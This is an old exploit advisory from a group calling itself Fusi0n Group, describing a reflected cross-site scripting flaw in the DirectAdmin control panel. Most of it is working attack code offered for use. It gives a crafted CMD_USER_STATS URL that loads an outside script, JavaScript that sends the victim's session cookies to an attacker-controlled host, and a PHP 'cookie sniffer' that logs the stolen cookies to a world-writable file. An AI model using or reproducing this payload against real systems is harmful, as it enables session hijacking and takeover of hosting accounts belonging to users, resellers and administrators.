-=[Fusi0n Group]=- # Script name .....: DirectAdmin # Script site .....: http://directadmin.com # Release Date ....: 15/03/2007 # Version .........: All # Find by .........: Mandr4ke # Contact .........: Mandr4ke.root[at]gmail.com # Greetings .......: Fusi0nGroup & DevilTeam & Nof ----------------------------------------------------------- Exploit: DirectAdmin Cross Site Scripting XSS ----------------------------------------------------------- # # All DirectAdmin level: User,Reseller,Admin. # # Exploit: # # http://localhost:2222/CMD_USER_STATS?RESULT=%3Cscript%20src='http://server.com/script.js'%3E&domain= # @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ http://server.com/script.php = CHMOD 777 Source: <?php $filename = "cookies.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "."; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "."; exit; } } echo "."; fclose($handle); exit; } echo "."; exit; //Cookie Sniffer by Kacper - DevilTeam ?> @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ http://server.com/script.js Source: location.href='http://server.com/script.php?cookie='+escape(document.cookie) @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ http://server.com/cookies.txt = CHMOD 777 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ # # PS ..............: Attacker must be authenticated # Contact .........: Mandr4ke.root[at]gmail.com #